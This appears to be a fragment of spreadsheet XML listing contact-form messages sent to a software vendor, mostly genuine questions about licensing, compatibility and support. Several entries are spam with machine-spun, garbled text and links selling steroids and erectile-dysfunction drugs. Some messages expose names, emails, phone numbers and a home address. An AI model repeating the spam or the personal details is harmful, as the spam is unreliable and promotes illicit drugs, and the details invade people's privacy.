get roommates consider ourselves "Foodies" nevertheless suck near the creating, and also that bad pallet. almost any meal they create carries slow cooked oatmeal, green spinach or Hungarian [url=http://topdatingview.com/reviews/read/charm-date]charmdate scam[/url] paprika on this website. Then to peak in the instance that at a distance they add sodium the availability of food from the time should be style unusual mostly given that they delight in beneficial friends youngsters,children's every once in awhile, the particular offspring have on choose eat at home except for I"M cooking food as they simply add seem to understand a 4 yr old doesn just want to eat a kale, Cauliflower, Cabbage, dark brown bean fritatta acted complete with cures greek yogurt lunchtime._x000D_
_x000D_
it will have most of the same setbacks as fanfiction. certainly 90% of it is usually not worthwhile visiting unfortunately on the other hand to select from of produced novels that the majority of aren superior both equally. simply be willing g to take a risk and therefore look training not in the top seller checklists._x000D_
_x000D_
add possibly forget the Martian was being home composed in addition to choose from free of charge on Wiers web coming from 2011 2013ish. correct seven a lot of years in a while the particular a idaho durations top seller that is the premise about one we recommend sci fi movies and games ever made._x000D_
_x000D_
TheGlennDavid 791 particular points uploaded 7 days your past_x000D_
_x000D_
2.17 method. they the particular one exactly where sam satisfies the woman, what people gets a nice werewolf, and then he battles to back up this lady, however is usually actually incapable of this he has jacob execute your woman's._x000D_
_x000D_
of shit have felt like a total one was first in dire need. in an instant the magnificent family car as well as also nice weaponry wild motel sites fall on holiday and you simply also using a college antique youngster sign [url=htt</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
I’m part of a task force that is doing the very preliminary work of looking at document generation and statement generation software for my business unit._x000D_
_x000D_
I read about your software on your website, but what I’d really like is to see some sample statements, both paper and digital that demonstrate the capabilities of what you can produce. If you have property/casualty insurance examples, that would be even better._x000D_
_x000D_
Please let me know if this is possible.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.copiadoraprintpaper.com.br/img/client.php?yyyy=171]buy kigtropin uk[/url]_x000D_
 Developing a method set up for dealing with your money is a vital component of grown-up existence. Start using these ideas as a basis for the very good private finance method and you'll be able to handle your own budget much better than at any time. On top of that, you'll have the capacity to sleep better, as well.Make Excellent Private Financing Choices Using This Assistance_x000D_
  [url=http://www.dann.be/wp-content/event.php?uk=1540-Trenbolone-Acetate-China,Clomid-Singapore-Forum,Testosterone-Phenylpropionate-Recipe.html]Trenbolone Acetate China[/url]_x000D_
 Ensure that while you are vehicle purchasing that you know what you're seeking initially. Call close to to several of the car dealerships and see in case they have something you'd be interested in. You can even find their website to check out the cars just before passing time rising there._x000D_
  [url=http://www.infacont.com/css/list.php?a=76-Generic-Cialis-Belgie,Generieke-Viagra-Belgie,Viagra-Pillen-Kopen]Generic Cialis Belgie[/url]_x000D_
 For those who have precious metal expensive jewelry, it is vital that you do not use severe chemicals if you attempt to thoroughly clean them. Severe chemicals will make your precious metal expensive jewelry uninteresting and make it drop its natural luster. You need to clean your gold precious jewelry with minor skin cleansers and warm water._x000D_
  [url=http://www.mandegar.asia/css/achieve.asp?once=93-Boldenone-Cypionate-Pip-Nandrolone-Steroids-Trenbolone-Acetate-Powder-Suppliers/]Boldenone Cypionate Pip[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.goattrax.com/Content/install.php?qja=Testosterone-Supplement-Reddit-Buy-Primobolan-Oral-Uk-Proviron-Pillole-893]Testosterone Supplement Reddit[/url]_x000D_
 Whenever using insurance carriers within the mobile phone to acquire quotations, maintain your driver's certificate information, motor vehicle information and recent plan useful. A lot of companies need information and facts from these resources to provide a precise quotation and having them convenient rates this process up to suit your needs and ensures you are delivering correct details for the insurance carrier._x000D_
  [url=http://www.iecs.com.br/classUpload/text.asp?produto=117]Cialis Pas Cher Livraison Rapide[/url]_x000D_
 Gripping the putter is extremely important not only at deal with, but during the entire putting cerebrovascular event. Sustain soft but adequate stress at deal with, whilst keeping your stress continual through the entire tackle and cerebrovascular event. This will help stop any jerky motions that could make you push or move the ball at make contact with._x000D_
  [url=http://www.distribuidordeferro.com.br/css/assets.php?bn=38]Cialis Pris Norge[/url]_x000D_
 It can be difficult to remain competitive in your niche if you are only doing fundamental marketing and advertising. Video tutorials are a great way to provide your own edge for your marketing. Be daring and bring your merchandise to reality with a few fantastic movie solutions. Using these suggestions at heart, you can attain new objectives with your good results.Use Video Marketing To Construct Your Company_x000D_
  [url=http://www.rduphold.com.br/components/libraries.php?down=Cialis-Generika-5mg-Cialis-Online-Kaufen-Erfahrungen-Kamagra-Kaufen-Ebay-47/]Cialis Generika 5mg[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Want to understand Archiving solutions and functionality. </t>
  </si>
  <si>
    <t>Need access to download latest version of xPression 4.6 SPx</t>
  </si>
  <si>
    <t xml:space="preserve">Error in launching Central tool, getting below error -_x000D_
_x000D_
Exception(EAEX)_x000D_
RETURNCODE Error 0004 - CNCT_ENTT: ENTITY LIST INIT ERROR_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Error in Central Launching. Getting error -_x000D_
_x000D_
Exception(EAEX)_x000D_
RETURNCODE Error 0004 - CNCT_ENTT: ENTITY LIST INIT ERROR</t>
  </si>
  <si>
    <t>We plan to update eDocs 5.3.1 to eDocs 16.1. In my role as documentmanager I would like to be able to oversee all changes in security and documentaccess. Could you send me a manual for the 16.1 version, or any material that will describe the way how access to documents and folders can be managed in version 16.1? Thank you very much in advance!_x000D_
_x000D_
With kind regards,_x000D_
Gerard Graave</t>
  </si>
  <si>
    <t>Business Partnership</t>
  </si>
  <si>
    <t>I would like to know the possibility for a course in Design Center - hold a our location._x000D_
I know you have 4 days courses in different locations, but can we get one trainer out to our location instead? We have used Vyv Lomax several times, and he could be a good trainer for our team.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ryzhenkova.com/wp-content/filter.php?y=257-Buy-Raw-Testosterone-Powder-Uk-Mesterolone-Cycle-Primobolan-Powder-Conversion/]Buy Raw Testosterone Powder Uk[/url]_x000D_
 It is important to recognize that tinnitus in itself is not really an illness, but that it must be a symptom. This is really important to remember simply because you must go to the physician when you notice tinnitus and you should not understand what its result in could possibly be. If brought on by good reasons besides loud disturbances, you could make a note of an issue with your whole body that might have otherwise gone unnoticed._x000D_
  [url=http://www.newcastleweddingsinger.co.uk/images/pear.php?ceo=135]Levitra Virketid[/url]_x000D_
 To maintain from becoming sorted being a spammy internet site by significant search engine listings, average responses on your internet site. Spammers commonly utilize the comments area of well-liked internet sites to junk e-mail links with their very own websites. When search engine listings see these links, they go through it as junk e-mail becoming placed all on your own internet site. Moderating remarks enables you to stop these responses from at any time being posted._x000D_
  [url=http://www.turbo-center.com/cache/director.php?s=902-Oxymetholone-Dosage,Sildenafil-Citrate-Powder-Suppliers,Trenbolone-Acetate-Benefits/]Oxymetholone Dosage[/url]_x000D_
 Use pay day loans simply for cash emergency situations. One of several benefits associated with a payday loan is it permits you to continue to be self-ample and manage your personal financial situation in exclusive. If you have to acquire the money from family or buddies, then you would need to disclose your financial predicament, which many people want to always keep to their selves._x000D_
  [url=http://www.metrofileholdings.com/admin/class.php?p=755-Nandrolone-Decanoate-Raw-Powder,Clomid-Singapore-Forum,Testosterone-Phenylpropionate-Recipe]Nandrolone Decanoate Raw Powder[/url]_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam_x000D_
_x000D_
I am greeting from Mongolia._x000D_
My customer Cybercrime Police of Mongolia is interesting Tableau Forensic SATA Drive Bay T3iu from us. _x000D_
Could you give me price quotation on this case urgently? _x000D_
I can buy from US California or China Beijing. there have a my forwarders._x000D_
_x000D_
Sincerely,_x000D_
Odmunkh</t>
  </si>
  <si>
    <t>Hello. Documentum Division was sold by EMC to Opentext (including product called eRoom also). SEB had support contract (until 28.02.2018) with EMC. I am seaching for possibilities to prolong this support contract (eRoom is used in SEB since 2001). Sincerely, Aivar Lindam</t>
  </si>
  <si>
    <t>Trying to gain access to the support portal and ensuring we have an up to date support contract</t>
  </si>
  <si>
    <t>Please delete my Profile (User: steffen.wittig@afi-solutions.com), because i am leaving AFI._x000D_
Please confim to me via Email._x000D_
Regards Steffen Wittig</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, _x000D_
_x000D_
wir bereiten gerade die Migration zu Windows 10 vor und ich habe die Aufgabe, sicherzustellen, dass die Programme, die wir verwenden, auch reibungslos funktionieren. Könnten Sie mir deshalb bitte folgende Fragen beantworten:_x000D_
_x000D_
-	Ist das Produkt CCS Correspondence, CCS Designer Windows 10 kompatibel?_x000D_
-	Welche ist die erste Version, die Windows 10 vollständig unterstützt?_x000D_
-	Welche ist die neueste Version, die Windows 10 vollständig unterstützt?_x000D_
_x000D_
Vielen Dank und einen schönen Tag noch!_x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Simon Jäger</t>
  </si>
  <si>
    <t xml:space="preserve">The prostate gland is the central section of a male's reproductive :. It secretes fluids that aid in the transportation and activation of sperm. The prostate gland is situated just in front of the rectum, below the bladder and around the urethra. When there is prostate problem, it is almost always very uncomfortable and inconvenient for the patient as his urinary method is directly affected. _x000D_
 _x000D_
The common prostate medical problems are prostate infection, enlarged prostate and cancer of prostate. _x000D_
 _x000D_
 _x000D_
 _x000D_
Prostate infection, also known as prostatitis, is among the most common prostate-related problem in men younger than 55 years of age. Infections of the prostate related are classified into four types - acute bacterial prostatitis, chronic bacterial prostatitis, chronic abacterial prostatitis and prosttodynia. _x000D_
 _x000D_
Acute bacterial prostatitis is the least common of most forms of prostate infection. It is brought on by bacteria located in the large intestines or urinary tract. Patients may experience fever, chills, body aches, back pains and urination problems. This condition is treated by using antibiotics or non-steroid anti-inflammatory drugs (NSAIDs) to relieve the swelling. _x000D_
 _x000D_
Chronic bacterial prostatitis is often a condition of a particular defect within the gland and the persistence presence of bacteria within the urinary tract. It can be a result of trauma to the urinary tract or by infections received from other parts in the body. A patient may go through testicular pain, back pains and urination problems. Although it is uncommon, it could be treated by removal with the prostate defect as well as the utilization antibiotics and NSAIDs to deal with the soreness. _x000D_
 _x000D_
Non-bacterial prostatitis is the reason approximately 90% of all prostatitis cases; however, researchers have not to ascertain the sources of these conditions. Some researchers think that chronic non-bacterial prostatitis occur as a consequence of unknown infectious agents while other feel </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, _x000D_
J'aurais aimé connaître le prix de votre outil ETL, Genio 7.0. _x000D_
Cordialement, _x000D_
Grange Ludivine </t>
  </si>
  <si>
    <t>Urgent: Today, we have OpenText Hostexplorer 14 in place with TLS1.0 encryption to the mainframe. Is there any newer version available, which Support TLS v1.2 encryption?</t>
  </si>
  <si>
    <t xml:space="preserve">photography equipment one word will make to spell out the actual_x000D_
_x000D_
Angola Angola's calm set up got fixed along with April 4, 2002. using the killing to UNITA leader Jonas Savimbi. the actual other hand first house warming this settlement between government entities and then UNITA guerrillas, Angolan bishops attracted the employees to recreate the particular to determine the plight on refugees. plus more than a million refugees sheltered within just ideologies, many islands omitted mealtime, medical care bills, in addition to education and learning, currently the bishops these. Angola makes regarding 14 million population, who 47% include Catholic._x000D_
_x000D_
Burundi our own Papal Nuncio, Archbishop emmanuel Courtney, was regarded as astonished that your chosen massacre associated with hopefully a thousand civilians on sept 9 induced very little global outcry. The Catholic local hall together with other your data was first relatively on his own in filing the opportunity on killings._x000D_
_x000D_
the government held responsible the fatalities on the subject of guerrillas each of the strains with regard to that support of all Democracy. sources for the article used by way of Catholic service Misna bought completely different story; They testified that the army's obligations for what happened experienced been unquestionable, along with also the doing away with happened bash guerrillas attained taken the actual area. the vast majority of subjects is mortally wounded all over frozen retain._x000D_
_x000D_
leading africa photo safari Republic following the March 15, 2003, hen house from past important associated staff member Francois Bozizze, that will ousted leader initial ante Felix Patasse, The bishops within a republic condemned the hen house or made into [url=http://www.digitaljournal.com/pr/3153871]CHARMDATE[/url] that do nothing but countrywide discussion would probably extricate the country from its never-ending cycle akin to physical violence. individuals deplored the violence and after that </t>
  </si>
  <si>
    <t xml:space="preserve">Inquiring about the RightFax Analytics, the white paper says available the administrator console and does not mention as a new piece of software.  Our analysts could not locate the option so I wanted to query as to if this was an add on._x000D_
</t>
  </si>
  <si>
    <t>Interested in OpenText Content Management Suite pricing.</t>
  </si>
  <si>
    <t>Hi there, Im trying to find out can I install Open Text Document &amp; report Menager on IBM i7.1 system, but so far no luck. Could you get back to me with this info please? And anyway, whats the minimum req for this to work? Thanks in advance. Martin</t>
  </si>
  <si>
    <t>We have two applications and both have different requirements:_x000D_
1. In one application, We want to convert html to accessible/tagged pdf on fly_x000D_
2. In other application we want to convert dynamic pdf XFA templates to accessible/section 508 compliant/tagged PDFs_x000D_
Do you have any java api or library which can fulfil above two requirements.</t>
  </si>
  <si>
    <t xml:space="preserve">need to review the capability and cost of host explorer 14 vs 15 (tls1.2, and cost of licenses)_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We’re currently engaged in an RFQ process to select a vendor that can fulfil our “Document Generation” needs at BNZ._x000D_
_x000D_
BNZ wishes to consolidate the majority of its ad-hoc document generation functionality onto a single platform. The aim is for the Document Generation platform to expose webservices to other components, and generate documents based on libraries of templates and/or snippets (partial templates) that contain all necessary logic to produce documents._x000D_
_x000D_
Based on an industry review we believe you could provide us with a solution that will meet our requirements, and have therefore included you in scope of the RFQ process._x000D_
_x000D_
Our intention is to send out the RFQ on the 13th June. Can you provide us with direct contact details of someone we can engage with through this process (preferably a local contact)?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We recently purchased maintenance for Exceed and Secure Shell.  Reference# RC267390 and Contract# 0012263475.  Does this include a support contract?  </t>
  </si>
  <si>
    <t>We would like to work with you for a tender project funded by the IADB for Honduras. Please send me an email back so I can give you the details and required software specifications.</t>
  </si>
  <si>
    <t>request quote for 10 licenses for brava desktop full version. I would like to purchase with a P.O</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, my name is Nahuel, I am Subra IT's CTO, and we are looking for a ECM software solution for a possible client._x000D_
_x000D_
I was checking the opentext's features, and apparently it is adjusted to our requirements._x000D_
_x000D_
So, I am contacting you to let us know license price for about 300 users, to install your product in our servers._x000D_
_x000D_
Best Regards,_x000D_
Nahuel._x000D_
</t>
  </si>
  <si>
    <t>I am searching a Email service provider are you in this business.</t>
  </si>
  <si>
    <t>DLA owns OpenText - is it compatible with.vfz files embedded within the tech docs. When opening the file, the software absolutely cannot convert or otherwise modify the file in any way. This is a contractual issue that may affect the validity of the files in terms of acceptance of the design, and violate existing agreements._x000D_
I can't find the list of supported file types on the webpage.</t>
  </si>
  <si>
    <t>Would like some information on how your software could help with our scanning process.  Today we scan documents that then have to be renamed and attached to an SAP document.  It is a slow and tedious process that usually is 3-4 months behind due to the time it takes.</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
We would like to be considered as a venue for future events that may be held in Toronto. we have a dedicated floor to Private Dining that can seat anywhere from 10 to 90 guests/. Our rooms a affixed with Smart Tv's and we offer the use of a lavalier microphone all at no additional cost._x000D_
_x000D_
I'd love to connect with your events team to discuss future events and how Morton's can facilitate your needs.</t>
  </si>
  <si>
    <t>Lost PMC key for our copy of td 6.0</t>
  </si>
  <si>
    <t>Downloaded update. The unit stopped working.</t>
  </si>
  <si>
    <t>We have OpenText already but I was asked to find other cities if any in Arizona that use it also.  Would it be possible to get that information? thank you,  Matt</t>
  </si>
  <si>
    <t>_x000D_
Greetings,_x000D_
_x000D_
I won't take much of your time and will be on the point -_x000D_
_x000D_
I want to work with this company_x000D_
_x000D_
I have experience working in Business Analysis and customer support._x000D_
_x000D_
I will work on whatever you want me to (because everything the company does is awesome)_x000D_
_x000D_
I will work for free (or whatever you pay)  to get my foot in the door _x000D_
_x000D_
I need a chance to prove that I possess the skills to help you_x000D_
_x000D_
And, I have spent countless hours of my time on your website. I've also read the T&amp;C's, so you know, I already know a lot :)_x000D_
_x000D_
Fingers crossed,_x000D_
Thanks_x000D_
_x000D_
Shakeeb_x000D_
2268990024</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon, I was contacted by someone named Lee saying that you were receiving checks from us, but we had no outstanding balances. I couldn't catch the check #s Could someone please contact me about this. Thanks so much. </t>
  </si>
  <si>
    <t>Hello!_x000D_
We are a full clinical lab located in NJ,USA._x000D_
We have recently purchased Multitech FaxFinder server hardware (model FF240.R2) and looking to find solution for automated software._x000D_
Is there an option to make RightFax software work with FaxFinder?_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Dear support,_x000D_
I'm not able to change my password. I have changed my email yesterday, as our company was renamed last year from Enovos International to Encevo, and since then I'm not able to connect. Can you help me ? Thanks.  _x000D_
jp</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I am interested in taking the "4-0144 REST API and Content Web Service Fundamentals v16" course. I have almost two years of experience with OT Web services APIs coding and developments._x000D_
I noticed that this course needs “4-0140 CSIDE Fundamentals” as a prerequisite. Can I register for the “4-0144 REST API and Content Web Service Fundamentals v16” directly without taking the prerequisite. The organization’s budget is too tight for training._x000D_
_x000D_
Please advise me_x000D_
_x000D_
Regards,_x000D_
Samir_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Support contract renew to gain access to downloads for Brava Viewer</t>
  </si>
  <si>
    <t>We have OpenText as our document repository, and would like to use OTDS (directory services). We would like to know the price and other details._x000D_
_x000D_
Thanks,_x000D_
Mahesh Recharla</t>
  </si>
  <si>
    <t>I was informed by Social Security I have money in a 401K Profit Sharing account #91-1190085-001 and would like to find out how to access it._x000D_
I tried to call, but was only sent to voice mail._x000D_
Thanks,_x000D_
Jay Gravelle</t>
  </si>
  <si>
    <t>We are in the initial stages of a web redesign project and we are evaluating DAM solutions would like to schedule a demo of your product. Our content management system is SDL - Tridion, and we asked them for recommendations for DAM's that integrate well with SDL - Tridion, and one of the companies they recommended was yours.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am contacting to email if eDOCS DM v10.0.0 and it's Records Management extension are compatible with Windows 10. Our ourganization is planning to make the switch from a Windows 7 environment to Windows 10._x000D_
_x000D_
Thanks,_x000D_
Matthew</t>
  </si>
  <si>
    <t xml:space="preserve">I need a quote for Federal DHA </t>
  </si>
  <si>
    <t>Groupe Casino supermarchés _x000D_
recherche solution de numérisation et stockage de documents</t>
  </si>
  <si>
    <t xml:space="preserve">We have a client that might need a rightfax deployment and I want to get some design assistance. </t>
  </si>
  <si>
    <t>Pursuing job opportunities in Canada, as a part of PR application for immigrantion to Canada</t>
  </si>
  <si>
    <t>Need licensing information ( Price list/ license or not licensed commercially)  on the below products:_x000D_
_x000D_
1.Advanced Workflow_x000D_
2.XML Workflow Extensions_x000D_
3.Content Server</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
Currently we are planning a migration to Windows 10, and the organization has eDocs Suite 5.3.1 with it's client application DM 5.3.1. I would like to know if there is a client application which is Windows 10 (64x) compatible? If there is an W10 compatible client, does the server/backend also needs to be upgraded to be compatible with this client?_x000D_
Thanks in advance,</t>
  </si>
  <si>
    <t xml:space="preserve">I can not download software brava desktop TX_x000D_
Product Description: Brava! Desktop TX_x000D_
Product Version: 16.4_x000D_
_x000D_
Software ID: 726A8D4F542F4A43A4794DFE4F06612E_x000D_
Software PIN: IGC463703_x000D_
_x000D_
Download Software	_x000D_
_x000D_
    In a separate email, new customers will receive steps to obtain your login information._x000D_
    You can find all other IGC Downloads at the below link:_x000D_
   _x000D_
_x000D_
    Notes: For Network licenses, you must download the License Manager._x000D_
_x000D_
    During install, choose option "Find location of IGCKey" and navigate to where "IGCKey.lic" is saved._x000D_
_x000D_
I can not recieve e mail where I can download </t>
  </si>
  <si>
    <t xml:space="preserve">Hello Good Day,_x000D_
 _x000D_
Would you be interested in acquiring 45,752 opt-in email contacts for CLOUDERA USERS? _x000D_
 _x000D_
Total Contacts with email: Cloudera Users - 45,752 contacts_x000D_
Delivery Format: Excel Spread Sheet/CSV_x000D_
Delivery Guarantee: 95% on Emails and 95% on other data fields_x000D_
_x000D_
We also provide Technology Users list like IBM, SAP, MS Users, Oracle, Sage, Accounting Software's, MS Dynamic, MS Exchange Server, Siebel, Sales force, Goldmine and any ERP, CRM Users and other _x000D_
_x000D_
industies list like Technology, Networking, Telecommunication, Healthcare, Finance, Manufacturing, Education, Chemical, Construction, Human Resources, Automotive, Printing &amp; Publishing, Marketing and Advertising, Hospitality, Retail, Rea_x000D_
l Estate and many more.. _x000D_
_x000D_
Please let me know target audience to take this discussion further_x000D_
 _x000D_
Best Regards,_x000D_
Carol Smith_x000D_
Head of Business Development_x000D_
</t>
  </si>
  <si>
    <t>Need an account in order to manage customers. Can't find the form.</t>
  </si>
  <si>
    <t>Hi,I looking for Linux VDI solution for my customer._x000D_
Cloud you give me exceed va turbox price?</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
Nous souhaiterions lancer un appel d’offre pour remplacer deux système d’informations pour AFNOR EDITION et AFNOR NORMALISATION. _x000D_
Pourrions-nous en discuter par téléphone afin de pouvoir vous envoyer l’expression succincte ? _x000D_
 _x000D_
Dans l'attente de votre retour, _x000D_
Cordialement, _x000D_
Myriam STOCK</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for content management and workflow process that work closely with SAP </t>
  </si>
  <si>
    <t>We presently use Open Text for PO and Non PO Invoices and I have a requirement to implement the Fiori Non PO Invoice Approval app.  I need to find out what I need to do to get access to and implement this app for our Users._x000D_
_x000D_
I found out about this available app from a discussion thread number 3779788._x000D_
_x000D_
Kind regards,_x000D_
Craig.</t>
  </si>
  <si>
    <t>Please block calls(discontinue fax) to listed _x000D_
phone# 848 469-8363</t>
  </si>
  <si>
    <t xml:space="preserve">A tool that can automatically replace client name (and key client information from all office documents – Word, PowerPoint and Excel including PDFs) with generic name like just ‘client’. The tool should be able to scan through images and screenshots and replace Client Name with Client_x000D_
</t>
  </si>
  <si>
    <t>Need Captiva Capture 7.1 Installables and further support</t>
  </si>
  <si>
    <t>Request for further information (functional and technical) on Vendor Invoice Management for potential implementation across UE, Powercor and CitiPower. All 3 organisations use SAP ERP for Accounts Payable.</t>
  </si>
  <si>
    <t>I would like to speak to someone about Open Text capability in content management, portal and digital experience platform.</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of consolidating our insurance offering across all of our brands, and are looking to bring the claims administration in-house (we currently outsource claims). _x000D_
_x000D_
To do this, we will need an insurance claims management system, from your website I can see you have multiple options in this area._x000D_
_x000D_
Can you please provide me with some more information regarding these options, and possible costs to implement/ongoing fees. _x000D_
_x000D_
Insurance products we offer:_x000D_
•	GAP Insurance_x000D_
•	Loan Protection Insurance (LPI) or Consumer Credit Insurance (CCI)_x000D_
•	Residual Protection Cover (RPC) aka Guaranteed Buyback_x000D_
_x000D_
We also have a motor vehicle warranty business that we may expand this software to also._x000D_
_x000D_
I look forward to discussing this further with you, I can be contacted via email or on 03 9097 3188._x000D_
</t>
  </si>
  <si>
    <t>Enquiry for Open Text IDM product.</t>
  </si>
  <si>
    <t>Would be interested in getting some pricing and a demo - thanks!_x000D_
We are a Vancouver based exploration company with around 25 full time staff._x000D_
Please call 604 377 2496 or email hazel@firstmininggold.com</t>
  </si>
  <si>
    <t>Two reasons._x000D_
1. Existing File No 2017/0030-01 is no more in the system, only the hardcopy is available Part 1 &amp; 2._x000D_
2. File No 2018/0032-01 is available through Admin Tool. Not coming up in Browser.</t>
  </si>
  <si>
    <t>Hi, I'm interested in speaking to someone in Product, or Tech Alliances. My company MapD is a full stack analytics platform which runs on GPUs, designed to handle massive workflows with milliseconds SQL query response time.  We're looking to team with companies with customer-facing platforms who might benefit from OEMing MapD to embed some of our capabilities into your product for certain use cases where your customers are trying to analyze data which are too large to visualize on a granular level, or use cases where existing performance is too slow and don't allow for a truly interactive experience. _x000D_
_x000D_
I look forward to speaking with someone from your team. _x000D_
_x000D_
All the best, _x000D_
_x000D_
Grant</t>
  </si>
  <si>
    <t>I have a list of market research questions that I am gathering for my company.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - I am investigating third party enterprise scale website archiving solutions for clients in the financial services industry. Please contact me for more details. </t>
  </si>
  <si>
    <t>Mayo Clinic is looking to send out and RFI as it relates to Digital Asset Management. We would like to send our RFI to OpenText. Is there a contact we can send this packet to?_x000D_
_x000D_
Thank you,_x000D_
Tia Calvert</t>
  </si>
  <si>
    <t>I'm interested in your OpenText SOCKS Client product. We have a corporate BlueCoat proxy with IWA enabled. Some of our applications do not work with IWA turned on, so we wish to locally intercept traffic HTTP traffic, add authentication headers when needed, and forward that traffic to our BlueCoat. Your product looks promising, but we do not use SOCKS, only HTTPS proxies. Could your product work for our use case?_x000D_
_x000D_
Thanks,_x000D_
Kevin</t>
  </si>
  <si>
    <t>unable to download software</t>
  </si>
  <si>
    <t xml:space="preserve">I would receive more information about the Exceed licensing option._x000D_
do you have floating option? or something to share licenses between different users in different locations._x000D_
Thanks_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Our parent company Blue Cross Blue Shield of Minnesota is retiring Case360 11.1.  Can you talk to us regarding options for continuing use of Case360 or replatforming it?  Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">18553344579 is my registered faxmail number. However, you still have my old email address as lucie.kennedy@zurichna.com. This is not a good email address. How do I get it changed to lucie.kennedy@zurichservices.com? </t>
  </si>
  <si>
    <t xml:space="preserve">Getting error when trying to reset my account password. </t>
  </si>
  <si>
    <t>Need internet fax capability</t>
  </si>
  <si>
    <t>Please forward to your VP of Sales._x000D_
_x000D_
I've been researching cybersecurity technology companies, in particular in the Endpoint Detection and Response sector._x000D_
_x000D_
If OpenText is interested in expanding their Sales coverage in the Dallas/Addison area, then please let me know as I would be interested in speaking with you about how my skills, knowledge, and experience in cybersecurity and in Sales might lend itself to helping you grow your revenues. _x000D_
_x000D_
I'm currently consulting to businesses on their cybersecurity strategies, am a board member of our local chapter of ISSA, and was recently inducted into InfraGard._x000D_
_x000D_
I'm based in the Dallas area, so if you're growing and want to expand further in this region, then please advise so we can set up a call._x000D_
_x000D_
_x000D_
_x000D_
Mark Langford_x000D_
Principal Consultant_x000D_
Aberfoyle Associates_x000D_
_x000D_
Cell (+1) 214 802 1926</t>
  </si>
  <si>
    <t>Our agency is looking to acquire redaction software and are looking for quotes.</t>
  </si>
  <si>
    <t>I am not able to download the ebook.  I get a _x000D_
_x000D_
The Information Provided is Incomplete or Invalid._x000D_
Industry - This field is required_x000D_
_x000D_
error.  But industry is not a field on the screen to enter data into.</t>
  </si>
  <si>
    <t>Just purchased one copy of Brava Desktop DXP 16.4, but when I try to download the software, it says I don't have access to that area.  Please advise.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day,_x000D_
_x000D_
ARYZTA LLC, a US-based manufacturer of frozen bakery goods, is requesting a 2017 revision Form W-8BEN-E from its foreign vendors. Please contact Diana Tang at (510) 667-6187 with any inquiries. Thank you for your cooperation._x000D_
</t>
  </si>
  <si>
    <t>We are a ByDesign customer and also are looking for a content management solution that integrates with SAP and has the following requirements met:_x000D_
_x000D_
Ease of use for users _x000D_
Searchable meta data as well as document content search (typically pdfs)_x000D_
Document security - secure to specific user or groups of users_x000D_
Ability to specify expiration dates_x000D_
Ability to report and send notifications based on expiration dates_x000D_
Document routing and approval would be nice but not necessarily required_x000D_
Integration with DocuSign would also be a nice to have</t>
  </si>
  <si>
    <t>We are looking forward to get an upgrade to our current RightFax software.</t>
  </si>
  <si>
    <t>I would like some more information on your fax server/service platforms and pricing.</t>
  </si>
  <si>
    <t>Looking at email to Fax solutions and would like to talk with someone about the Rightfax products.</t>
  </si>
  <si>
    <t>Unable to reach "My support" to be able to open a ticket. Looks like it keeps returning to the sign in screen. I can give a call or try later. Just wanted to let you know.</t>
  </si>
  <si>
    <t>Hi documentum team, _x000D_
My company this interested in your software, for develop a program of data base for a virtual library; we need price for the rental of your system._x000D_
attentively_x000D_
Miguel Merma</t>
  </si>
  <si>
    <t>[Anfrage für HR]_x000D_
Guten Tag,_x000D_
ich war im Zeitraum 1.1.2008 bis 28.2.2011 bei Ihnen tätig._x000D_
Für diesen Zeitraum benötige ich eine Arbeitsbescheinigung._x000D_
_x000D_
Kontakt:_x000D_
Ozan Süel, Dreimühlenstrasse 30, 80469 München, +491776280865, ozan.sueel@gmail.com_x000D_
_x000D_
Vielen Dank,_x000D_
mit freundlichen Grüßen, Ozan Süel</t>
  </si>
  <si>
    <t>I would like to learn more about your drawing management capabilities as soon as possible.</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
we are currently preparing the migration to Windows 10 and I am responsible for ensuring that software, which is currently being used, will work fine with it. Therefore, could you please answer following questions for me:_x000D_
_x000D_
-	Is the product C4 Correspondence and C4 Designer compatible with Windows 10?_x000D_
-	What is the first version to fully support Windows 10?_x000D_
-	What is the latest version to fully support Windows 10? _x000D_
_x000D_
Thank you very much and have a nice day!_x000D_
_x000D_
Kind regards,_x000D_
Simon Jaeger</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
We're interested in having your products in our platform and would love to discuss it with you. My name is Dovydas Bulanavcius and I represent Aciety, a network of top 10% (900+) European software outsourcing companies._x000D_
Starting with June 2018, we're expanding beyond software teams and launching a software marketplace and would love your product to be here._x000D_
Participation is free (only sales commission applies), we’ll be bundling and otherwise selling your product to clientele of Aciety network, creating you a new, very targeted sales channel. _x000D_
</t>
  </si>
  <si>
    <t>Cannot download software, repeatedly asked to confirm email address.</t>
  </si>
  <si>
    <t xml:space="preserve">Job opportunity for VP sales Russia </t>
  </si>
  <si>
    <t>I  applied for Assistant financial controller job.if you not select me for senior financial controller then consider for Assistant financial controller</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm contacting you on behalf of a large multinational corporate client who are looking for a system to manage information about their marketing campaigns and share information about the strategy, details and results across the global business._x000D_
_x000D_
The client has asked that we include OpenText + SAP in our evaluation._x000D_
_x000D_
